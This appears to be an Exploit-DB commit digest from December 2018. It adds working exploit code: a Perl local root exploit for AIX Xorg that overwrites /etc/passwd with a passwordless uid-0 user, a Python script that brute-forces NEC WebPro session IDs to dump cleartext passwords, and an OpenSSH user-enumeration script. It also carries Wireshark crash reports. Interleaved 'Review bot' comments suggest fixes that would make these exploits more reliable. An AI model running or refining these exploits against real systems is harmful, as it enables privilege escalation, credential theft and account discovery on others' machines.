DB: 2018-12-05

19 changes to exploits/shellcodes

Microsoft Lync for Mac 2011 - Injection Forced Browsing/Download
Wireshark - 'cdma2k_message_ACTIVE_SET_RECORD_FIELDS' Stack Corruption
Wireshark - 'find_signature' Heap Out-of-Bounds Read
Xorg X11 Server (AIX) - Local Privilege Escalation
Emacs - movemail Privilege Escalation (Metasploit)
OpenSSH < 7.7 - User Enumeration (2)
HP Intelligent Management - Java Deserialization RCE (Metasploit)
Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass
DomainMOD 4.11.01 - Owner name Field Cross-Site Scripting
NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage
KeyBase Botnet 1.5 - SQL Injection
Dolibarr ERP/CRM 8.0.3 - Cross-Site Scripting
DomainMOD 4.11.01 - Custom Domain Fields Cross-Site Scripting
DomainMOD 4.11.01 - Custom SSL Fields Cross-Site Scripting
NUUO NVRMini2 3.9.1 - Authenticated Command Injection
DomainMOD 4.11.01 - Registrar Cross-Site Scripting
FreshRSS 1.11.1 - Cross-Site Scripting

Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)
Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)
Offensive Security 2018-12-05 05:01:44 +00:00
parent 0a4925cc93
commit 60710bbfd9
21 changed files with 1523 additions and 0 deletions

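--- a/exploits/aix/local/45938.pl
+++ b/exploits/aix/local/45938.pl
@@ -0,0 +1,149 @@
+# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation
+# Date: 29/11/2018
+# Exploit Author: @0xdono
+# Original Discovery and Exploit: Narendra Shinde
+# Vendor Homepage: https://www.x.org/
+# Platform: AIX
+# Version: X Window System Version 7.1.1
+# Fileset: X11.base.rte < 7.1.5.32
+# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)
+# CVE: CVE-2018-14665
+#
+# Explanation:
+# Incorrect command-line parameter validation in the Xorg X server can
+# lead to privilege elevation and/or arbitrary files overwrite, when the
+# X server is running with elevated privileges.
+# The -logfile argument can be used to overwrite arbitrary files in the
+# file system, due to incorrect checks in the parsing of the option.
+#
+# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.
+# It overwrites /etc/passwd in order to create a new user with root privile=
+ges.=20
+# All currently logged in users need to be included when /etc/passwd is ove=
+rwritten,
+# else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to ch=
+ange user.
+# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX=
+,
+# and is replaced by '-config'.
+# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.
+#
+# IBM has not yet released a patch as of 29/11/2018.
+#
+# See also:
+# https://lists.x.org/archives/xorg-announce/2018-October/002927.html
+# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
+# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl
+#
+# Usage:
+# $ oslevel -s
+# 7100-04-00-0000
+# $ Xorg -version
+# =20
+# X Window System Version 7.1.1
+# Release Date: 12 May 2006
+# X Protocol Version 11, Revision 0, Release 7.1.1
+# Build Operating System: AIX IBM
+# Current Operating System: AIX sovma470 1 7 00C3C6F54C00
+# Build Date: 07 July 2006
+# Before reporting problems, check http://wiki.x.org
+# to make sure that you have the latest version.
+# Module Loader present
+# $ id
+# uid=3D16500(nmyo) gid=3D1(staff)
+# $ perl aixxorg.pl
+# [+] AIX X11 server local root exploit
+# [-] Checking for Xorg and ksh93=20
+# [-] Opening /etc/passwd=20
+# [-] Retrieving currently logged in users=20
+# [-] Generating Xorg command=20
+# [-] Opening /tmp/wow.ksh=20
+# [-] Writing Xorg command to /tmp/wow.ksh=20
+# [-] Backing up /etc/passwd to /tmp/passwd.backup=20
+# [-] Making /tmp/wow.ksh executable=20
+# [-] Executing /tmp/wow.ksh=20
+# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh=20
+# [-] Done=20
+# [+] 'su wow' for root shell=20
+# $ su wow
+# # id
+# uid=3D0(root) gid=3D0(system)
+# # whoami
+# root
+#!/usr/bin/perl
+print "[+] AIX X11 server local root exploit\n";
+# Check Xorg is in path
+print "[-] Checking for Xorg and ksh93 \n";
+chomp($xorg =3D `command -v Xorg`);
+if ($xorg eq ""){=20
+print "[X] Can't find Xorg binary, try hardcode it? exiting... \n";
+exit;
+}
+# Check ksh93 is in path
+chomp($ksh =3D `command -v ksh93`);
+if ($ksh eq ""){
+print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n";
+exit;
+}
+# Read in /etc/passwd
+print "[-] Opening /etc/passwd \n";
+open($passwd_fh, '<', "/etc/passwd");
+chomp(@passwd_array =3D <$passwd_fh>);
+close($passwd_fh);
+# Retrieve currently logged in users
+print "[-] Retrieving currently logged in users \n";
+@users =3D `who | cut -d' ' -f1 | sort | uniq`;
+chomp(@users);
+# For all logged in users, add their current passwd entry to string
+# that will be used to overwrite passwd
+$users_logged_in_passwd =3D '';
+foreach my $user (@users)
+{
+$user .=3D ":";
+foreach my $line (@passwd_array)
+{
+if (index($line, $user) =3D=3D 0) {
+$users_logged_in_passwd =3D $users_logged_in_passwd . '\n' . $l=
+ine;
+}
+}
+}
+# Use '-config' as '-fp' (which is used in the original BSD exploit) is not=
+written to log
+print "[-] Generating Xorg command \n";
+$blob =3D '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/us=
+r/bin/ksh\n#' . '\'';
+print "[-] Opening /tmp/wow.ksh \n";=09=09
+open($fr, '>', "/tmp/wow.ksh");
+# Use ksh93 for ANSI-C quoting
+print "[-] Writing Xorg command to /tmp/wow.ksh \n";
+print $fr '#!' . "$ksh\n";
+print $fr "$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \n";
+close $fr;
+# Backup passwd=20
+print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n";
+system("cp /etc/passwd /tmp/passwd.backup");
+# Make script executable and run it
+print "[-] Making /tmp/wow.ksh executable \n";
+system("chmod +x /tmp/wow.ksh");
+print "[-] Executing /tmp/wow.ksh \n";
+system("/tmp/wow.ksh");
+# Replace overwritten passwd with: original passwd + wow user
+print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n";
+$result =3D `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0=
+::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`;
+print "[-] Done \n";
+print "[+] 'su wow' for root shell \n";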
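Review bot: The committed script body appears to be quoted-printable encoded rather than plain Perl — `=3D` where `=` is meant (`chomp($xorg =3D `command -v Xorg`);`, `if (index($line, $user) =3D=3D 0)`), `=20`/`=09` trailing whitespace, and soft line breaks ending in `=` that split the `$blob` and `su` statements across two lines — so as stored the file would not compile; presumably a mail-transport artifact, worth confirming against the upstream copy before it is published. Separately, neither `open` is checked and the file has no `use strict; use warnings;`: if `/etc/passwd` cannot be read, `@passwd_array` is empty and the generated entry list silently omits every logged-in user, which the header itself says breaks `su`. The backup `cp`, the `chmod`, and the final restoring `su wow -c ...` are likewise unchecked, so a failure in any of them leaves `/etc/passwd` in the overwritten state. `open(my $passwd_fh, '<', '/etc/passwd') or die "open /etc/passwd: $!";` and `system(...) == 0 or die "backup failed: $?";` ahead of the execution step would make the script stop before it can leave the test host in that condition.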


@ -0,0 +1,15 @@
# Exploit Title: Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control
# Date: 2018-11-27
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.rockwellautomation.com/
# Version: 1408-EM3A-ENT B
# Tested on: It is a proprietary devices: https://ab.rockwellautomation.com/zh/Energy-Monitoring/1408-PowerMonitor-1000
# CVE : CVE-2018-19616
# 1. Description:
# In Rockwell Automation Allen-Bradley PowerMonitor 1000 web page, there are a few buttons are disabled,
# such as “Edit”, “Remove”, “AddNew”, “Change Policy Holder” and “Security Configuration”.
# View the source code of login page, those buttons/functions just use the “disabled” parameter to control the access right.
# It is allow attackers using proxy to erase the “disabled” parameter, and enable those buttons/functions.
# Once those buttons/functions are enabled.
# Attackers is capable to add a new user who have administrator right.


@ -0,0 +1,178 @@
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NEC-UNIVERGE-WEBPRO-v6.00-PREDICTABLE-SESSIONID-CLEARTEXT-PASSWORDS.txt
[+] ISR: ApparitionSec
***Greetz: indoushka | Eduardo B. 0day***
[Vendor]
www.necam.com
[Affected Product Code Base]
NEC Univerge Sv9100 WebPro - 6.00.00
NEC Univerge WebPro, is a web-based programming tool for the NEC Switch, which is used to program corporate Telephone systems.
Public facing installations as of Dec 1, 2018
https://www.shodan.io/search?query=Server+Henry
Result: 7,797
[Vulnerability Type(s)]
[CVE Reference(s)]
Predictable Session ID - CVE-2018-11741 / Cleartext Password Storage - CVE-2018-11742
[Attack Vectors]
Make repeated remote HTTP requests until arriving at a valid authenticated sessionId.
Security Issue:
================
NEC Univerge WebPro suffers from a "Predictable Session ID" that can potentially disclose all user account information including passwords stored in clear text in the Web UI.
Attackers can simply increment numbers until arriving at a live session, then by using a specific URI dump the entire account information for all users including the clear text passwords.
e.g..
curl http://NEC-VICTIM-IP/Home.htm?sessionId=12959&GOTO(8)
Exploit/POC:
=============
'''
from socket import *
import re
#Univerge Sv9100 NEC WebPro : 6.00
#Dumps user accounts and plaintext passwords stored in Web UI in Administrator Programming Password Setup' webpage
#http://TARGET-IP/Home.htm?sessionId=12959&GOTO(8) "GOTO(8)" will retrieve all account usernames and cleartext passwords.
print "NEC Univerge Sv9100 WebPro - 6.00.00 / Remote 0day Exploit POC"
print "hyp3rlinx"
IP=raw_input("[+] TARGET> ")
res=''
findme="Programming Password Setup"
cnt=0
tmp=False
tmp2=False
pwned=False
#check application is NEC and vuln version
def is_NEC_webpro(u):
global tmp,tmp2,cnt
res=''
cnt+=1
s=socket(AF_INET, SOCK_STREAM)
s.connect((IP,80))
s.send('GET '+u+' HTTP/1.1\r\nHost: '+IP+'\r\n\r\n')
while True:
res=s.recv(4048)
if res.find('</html>')!=-1:
break
s.close()
if re.findall(r"\bWebPro\b", res):
tmp=True
if tmp and cnt < 3:
is_NEC_webpro('/Login.htm')
if re.findall(r"\b6.00.00\b", res) and re.findall(r"\bNEC Corporation of America\b", res):
tmp2 = True
if tmp == True and tmp2 == True:
return True
return False
def dump(acct):
file=open('NEC-Accounts.txt', 'w')
file.write(acct+'\n')
file.close()
def breach(sid):
global pwned
try:
s=socket(AF_INET, SOCK_STREAM)
s.connect((IP,80))
sid=str(sid)
print 'trying sessid '+sid
s.send('GET /Home.htm?sessionId%3d'+sid+'&GOTO(8)%20HTTP/1.1\r\nHost: '+IP+'\r\n\r\n')
except Exception as e:
print str(e)
while True:
res = s.recv(4096)
if res.find('</html>')!=-1:
break
if re.findall(r"\bProgramming Password Setup\b",res)!=-1: ## We hit an active session.
dump(res)
print res
pwned=True
s.close()
return pwned
def sessgen():
for sessid in range(1000,15000): ##test 14109
if breach(sessid):
break
if __name__=='__main__':
if is_NEC_webpro('/'):
sessgen()
else:
print 'Not NEC or version not vuln.'
'''
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: May 15, 2018
No reply
Vendor Notification: May 18, 2018
No reply
Vendor Notification: June 4, 2018
No reply
Mitre assign CVE: June 5, 2018
JPCERT replies: June 6, 2018
JPCERT shares information with NEC : June 7, 2018
Request status : August 11, 2018
JPCERT contact NEC : August 14, 2018
No reply from vendor
Request status : August 21, 2018
JPCERT again contacts NEC : August 21, 2018
JPCERT "vendor working on a release" : August 23 2018
JPCERT "Vendor release October 2018" : September 12, 2018
NEC "Requests public disclosure after December 1st." : November 19, 2018
December 2, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
'''
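Review bot: The match test in `breach`, `if re.findall(r"\bProgramming Password Setup\b",res)!=-1:`, is always true because `re.findall` returns a list and a list never equals `-1`, so every response is written to `NEC-Accounts.txt`, printed, and `pwned` is set on the very first request regardless of content; the `findme` global defined earlier is never used. The `except Exception` at the top of `breach` only prints the connection error and then falls through to `s.recv` on a socket that never connected, and the `while True` receive loops in both `is_NEC_webpro` and `breach` have no exit when `recv` returns `''` (peer closed without sending `</html>`), so they spin forever; `if not res: break` inside each loop and a `return pwned` in the handler would close both gaps. `dump` opens the output file with `'w'`, truncating any earlier capture on each call. Indentation has been flattened in this rendering, so the block structure above is inferred from the keywords.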

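--- a/exploits/linux/remote/45939.py
+++ b/exploits/linux/remote/45939.py
@@ -0,0 +1,66 @@
+#!/usr/bin/env python2
+# CVE-2018-15473 SSH User Enumeration by Leap Security (@LeapSecurity) https://leapsecurity.io
+# Credits: Matthew Daley, Justin Gardner, Lee David Painter
+import argparse, logging, paramiko, socket, sys, os
+class InvalidUsername(Exception):
+pass
+# malicious function to malform packet
+def add_boolean(*args, **kwargs):
+pass
+# function that'll be overwritten to malform the packet
+old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[
+paramiko.common.MSG_SERVICE_ACCEPT]
+# malicious function to overwrite MSG_SERVICE_ACCEPT handler
+def service_accept(*args, **kwargs):
+paramiko.message.Message.add_boolean = add_boolean
+return old_service_accept(*args, **kwargs)
+# call when username was invalid
+def invalid_username(*args, **kwargs):
+raise InvalidUsername()
+# assign functions to respective handlers
+paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = service_accept
+paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = invalid_username
+# perform authentication with malicious packet and username
+def check_user(username):
+sock = socket.socket()
+sock.connect((args.target, args.port))
+transport = paramiko.transport.Transport(sock)
+try:
+transport.start_client()
+except paramiko.ssh_exception.SSHException:
+print '[!] Failed to negotiate SSH transport'
+sys.exit(2)
+try:
+transport.auth_publickey(username, paramiko.RSAKey.generate(2048))
+except InvalidUsername:
+print "[-] {} is an invalid username".format(username)
+sys.exit(3)
+except paramiko.ssh_exception.AuthenticationException:
+print "[+] {} is a valid username".format(username)
+# remove paramiko logging
+logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
+parser = argparse.ArgumentParser(description='SSH User Enumeration by Leap Security (@LeapSecurity)')
+parser.add_argument('target', help="IP address of the target system")
+parser.add_argument('-p', '--port', default=22, help="Set port of SSH service")
+parser.add_argument('username', help="Username to check for validity.")
+if len(sys.argv) == 1:
+parser.print_help()
+sys.exit(1)
+args = parser.parse_args()
+check_user(args.username)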
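Review bot: `-p/--port` is declared without `type=int`, so a port supplied on the command line reaches `sock.connect((args.target, args.port))` as a string and raises `TypeError`; only the default `22` (an int literal) works. `parser.add_argument('-p', '--port', default=22, type=int, help="Set port of SSH service")` fixes that. `check_user` also never closes `transport` or `sock` on any path and calls `sys.exit` from inside the helper instead of returning a result, so a `try/finally` that calls `transport.close()` around the `auth_publickey` attempt would be cleaner; `os` is imported and never used. The rewiring of `paramiko.auth_handler.AuthHandler._client_handler_table` and `paramiko.message.Message.add_boolean` relies on private paramiko internals and is not pinned to a paramiko release, so it can stop working silently on other versions — the header should state the paramiko version it was tested against.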


@ -0,0 +1,180 @@
The following crash due to a stack-based out-of-bounds memory access can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
Attached are three files which trigger the crash.
--- cut ---
==25039==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc0298b086 at pc 0x7fb8215577d8 bp 0x7ffc0298b050 sp 0x7ffc0298b048
READ of size 2 at 0x7ffc0298b086 thread T0
#0 0x7fb8215577d7 in cdma2k_message_ACTIVE_SET_RECORD_FIELDS wireshark/epan/dissectors/packet-cdma2k.c:3861:89
#1 0x7fb8215577d7 in cdma2k_message_HANDOFF_DIR wireshark/epan/dissectors/packet-cdma2k.c:3116
#2 0x7fb821546ea5 in cdma2k_message_decode wireshark/epan/dissectors/packet-cdma2k.c:1224:19
#3 0x7fb821544f23 in dissect_cdma2k wireshark/epan/dissectors/packet-cdma2k.c:4406:13
#4 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#5 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#6 0x7fb823372cb8 in call_dissector_only wireshark/epan/packet.c:3141:8
#7 0x7fb823372cb8 in call_dissector_with_data wireshark/epan/packet.c:3154
#8 0x7fb821908908 in gcsna_message_GCSNA1xCircuitService wireshark/epan/dissectors/packet-gcsna.c:211:9
#9 0x7fb821908908 in gcsna_message_decode wireshark/epan/dissectors/packet-gcsna.c:119
#10 0x7fb821908908 in dissect_gcsna wireshark/epan/dissectors/packet-gcsna.c:342
#11 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#12 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#13 0x7fb823372cb8 in call_dissector_only wireshark/epan/packet.c:3141:8
#14 0x7fb823372cb8 in call_dissector_with_data wireshark/epan/packet.c:3154
#15 0x7fb82307a3d3 in dissect_s1ap_Cdma2000PDU wireshark/./asn1/s1ap/s1ap.cnf:638:9
#16 0x7fb82307a3d3 in dissect_Cdma2000PDU_PDU wireshark/./asn1/s1ap/s1ap.cnf:1313
#17 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#18 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#19 0x7fb823376610 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
#20 0x7fb82309bd90 in dissect_ProtocolIEFieldValue wireshark/./asn1/s1ap/packet-s1ap-template.c:367:11
#21 0x7fb8220c7430 in dissect_per_open_type_internal wireshark/epan/dissectors/packet-per.c:232:5
#22 0x7fb8220c7692 in dissect_per_open_type_pdu_new wireshark/epan/dissectors/packet-per.c:253:9
#23 0x7fb8220d5ff9 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1899:12
#24 0x7fb82309b878 in dissect_s1ap_ProtocolIE_Field wireshark/./asn1/s1ap/s1ap.cnf:145:12
#25 0x7fb8220cec9e in dissect_per_sequence_of_helper wireshark/epan/dissectors/packet-per.c:564:10
#26 0x7fb8220cec9e in dissect_per_constrained_sequence_of wireshark/epan/dissectors/packet-per.c:939
#27 0x7fb8230a8950 in dissect_s1ap_ProtocolIE_Container wireshark/./asn1/s1ap/s1ap.cnf:158:12
#28 0x7fb8220d5ff9 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1899:12
#29 0x7fb82308f5ee in dissect_s1ap_E_RABSetupRequest wireshark/./asn1/s1ap/s1ap.cnf:2014:12
#30 0x7fb82308f5ee in dissect_E_RABSetupRequest_PDU wireshark/./asn1/s1ap/s1ap.cnf:2945
#31 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#32 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#33 0x7fb823376610 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
#34 0x7fb8230a9442 in dissect_InitiatingMessageValue wireshark/./asn1/s1ap/packet-s1ap-template.c:402:11
#35 0x7fb8220c7430 in dissect_per_open_type_internal wireshark/epan/dissectors/packet-per.c:232:5
#36 0x7fb8220c7692 in dissect_per_open_type_pdu_new wireshark/epan/dissectors/packet-per.c:253:9
#37 0x7fb8220d5ff9 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1899:12
#38 0x7fb8230a9098 in dissect_s1ap_InitiatingMessage wireshark/./asn1/s1ap/s1ap.cnf:145:12
#39 0x7fb8220d4d35 in dissect_per_choice wireshark/epan/dissectors/packet-per.c:1749:4
#40 0x7fb8230993a4 in dissect_s1ap_S1AP_PDU wireshark/./asn1/s1ap/s1ap.cnf:179:12
#41 0x7fb8230993a4 in dissect_S1AP_PDU_PDU wireshark/./asn1/s1ap/s1ap.cnf:3841
#42 0x7fb8230993a4 in dissect_s1ap wireshark/./asn1/s1ap/packet-s1ap-template.c:451
#43 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#44 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#45 0x7fb823376610 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
#46 0x7fb82230cd76 in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2531:9
#47 0x7fb822306b25 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3494:16
#48 0x7fb822302464 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c
#49 0x7fb8222fffd9 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4610:9
#50 0x7fb8222fffd9 in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4751
#51 0x7fb8222fc59b in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4815:3
#52 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#53 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#54 0x7fb823376610 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
#55 0x7fb821b8ee45 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1831:7
#56 0x7fb821bd37d9 in ipv6_dissect_next wireshark/epan/dissectors/packet-ipv6.c:2458:9
#57 0x7fb821bd54d3 in dissect_ipv6 wireshark/epan/dissectors/packet-ipv6.c:2406:5
#58 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#59 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#60 0x7fb823372cb8 in call_dissector_only wireshark/epan/packet.c:3141:8
#61 0x7fb823372cb8 in call_dissector_with_data wireshark/epan/packet.c:3154
#62 0x7fb821b8f6dd in dissect_ip wireshark/epan/dissectors/packet-ip.c:2315:5
#63 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#64 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#65 0x7fb823377289 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
#66 0x7fb823377289 in dissector_try_uint wireshark/epan/packet.c:1407
#67 0x7fb821fb4c99 in dissect_null wireshark/epan/dissectors/packet-null.c:410:12
#68 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#69 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#70 0x7fb823376610 in dissector_try_uint_new wireshark/epan/packet.c:1383:8
#71 0x7fb8218f7a28 in dissect_frame wireshark/epan/dissectors/packet-frame.c:579:11
#72 0x7fb823376be0 in call_dissector_through_handle wireshark/epan/packet.c:706:9
#73 0x7fb823376be0 in call_dissector_work wireshark/epan/packet.c:791
#74 0x7fb823372cb8 in call_dissector_only wireshark/epan/packet.c:3141:8
#75 0x7fb823372cb8 in call_dissector_with_data wireshark/epan/packet.c:3154
#76 0x7fb8233721ee in dissect_record wireshark/epan/packet.c:580:3
#77 0x7fb823355068 in epan_dissect_run_with_taps wireshark/epan/epan.c:547:2
#78 0x558d13281917 in process_packet_single_pass wireshark/tshark.c:3572:5
#79 0x558d1327cd12 in process_cap_file wireshark/tshark.c:3403:11
#80 0x558d1327cd12 in real_main wireshark/tshark.c:2046
#81 0x7fb816e972b0 in __libc_start_main
#82 0x558d1317ea49 in _start
Address 0x7ffc0298b086 is located in stack of thread T0 at offset 38 in frame
#0 0x7fb82154fc4f in cdma2k_message_HANDOFF_DIR wireshark/epan/dissectors/packet-cdma2k.c:2856
This frame has 1 object(s):
[32, 34) 'l_offset' <== Memory access at offset 38 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/epan/dissectors/packet-cdma2k.c:3861:89 in cdma2k_message_ACTIVE_SET_RECORD_FIELDS
Shadow bytes around the buggy address:
0x1000005295c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000005295d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000005295e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000005295f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100000529600: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
=>0x100000529610:[02]f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x100000529620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100000529630: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 02 f3 f3 f3
0x100000529640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100000529650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100000529660: f1 f1 f1 f1 04 f2 02 f3 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==25039==ABORTING
--- cut ---
A brief analysis shows that the cdma2k_message_ACTIVE_SET_RECORD_FIELDS() function accepts an "guint16 *l_offset" argument, and successively increases the value under the pointer as it parses through the packet, e.g.:
--- cut ---
3797 *l_offset+=5;
...
3808 *l_offset+=4;
...
3815 *l_offset+=5;
...
3835 *l_offset+=3;
--- cut ---
In lines 3860 and 3865 however, the code increases the pointer itself and not the underlying value, causing it to point to some invalid location on the stack. The extent to which the pointer is shifted by is somewhat controlled by the attacker due to the loop in lines 3862-3867:
--- cut ---
3859 recLen = tvb_get_bits8(tvb,*l_offset, 3);
3860 l_offset+=3;
3861 item2 = proto_tree_add_item(subtree1, hf_cdma2k_Type_Specific_Fields, tvb, (*l_offset/8),recLen+1, ENC_NA);
3862 while(recLen > 0)
3863 {
3864 proto_item_append_text(item2," 0x%02x",tvb_get_bits8(tvb,*l_offset, 8));
3865 l_offset+=8;
3866 recLen-=1;
3867 }
--- cut ---
Later in the code, the corrupted l_offset pointer is both read from and written to multiple times:
--- cut ---
3869 proto_tree_add_bits_item(subtree1, hf_cdma2k_Pwr_Comb_Ind, tvb, *l_offset, 1, ENC_BIG_ENDIAN);
3870 *l_offset+=1;
3871 if(chInd == 5 || chInd == 7)
3872 {
3873 proto_tree_add_bits_item(subtree1, hf_cdma2k_Code_Chan_Fch, tvb, *l_offset, 11, ENC_BIG_ENDIAN);
3874 *l_offset+=11;
3875 proto_tree_add_bits_item(subtree1, hf_cdma2k_Qof_Mask_Id_Fch, tvb, *l_offset, 2, ENC_BIG_ENDIAN);
3876 *l_offset+=2;
3877 }
--- cut ---
Such non-continuous stack-based OOB writes could be leveraged to execute arbitrary code in the context of the Wireshark process.
The bug was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=15322. Attached are three files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45950.zip


@ -0,0 +1,57 @@
The following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==35788==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62d0000e4400 at pc 0x7f326122bbcc bp 0x7ffef079bc70 sp 0x7ffef079bc68
READ of size 1 at 0x62d0000e4400 thread T0
#0 0x7f326122bbcb in find_signature wireshark/wiretap/vwr.c:3194:13
#1 0x7f32612233e5 in vwr_read_s3_W_rec wireshark/wiretap/vwr.c:2160:19
#2 0x7f32612233e5 in vwr_process_rec_data wireshark/wiretap/vwr.c:3356
#3 0x7f326121acf6 in vwr_read wireshark/wiretap/vwr.c:870:10
#4 0x7f326122e989 in wtap_read wireshark/wiretap/wtap.c:1256:7
#5 0x55da2a01be4f in process_cap_file wireshark/tshark.c:3396:12
#6 0x55da2a01be4f in real_main wireshark/tshark.c:2046
0x62d0000e4400 is located 0 bytes to the right of 32768-byte region [0x62d0000dc400,0x62d0000e4400)
allocated by thread T0 here:
#0 0x55da29fd30c0 in malloc (wireshark/tshark+0x1120c0)
SUMMARY: AddressSanitizer: heap-buffer-overflow wireshark/wiretap/vwr.c:3194:13 in find_signature
Shadow bytes around the buggy address:
0x0c5a80014830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c5a80014840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c5a80014850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c5a80014860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c5a80014870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c5a80014880:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5a80014890: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5a800148a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5a800148b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5a800148c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5a800148d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
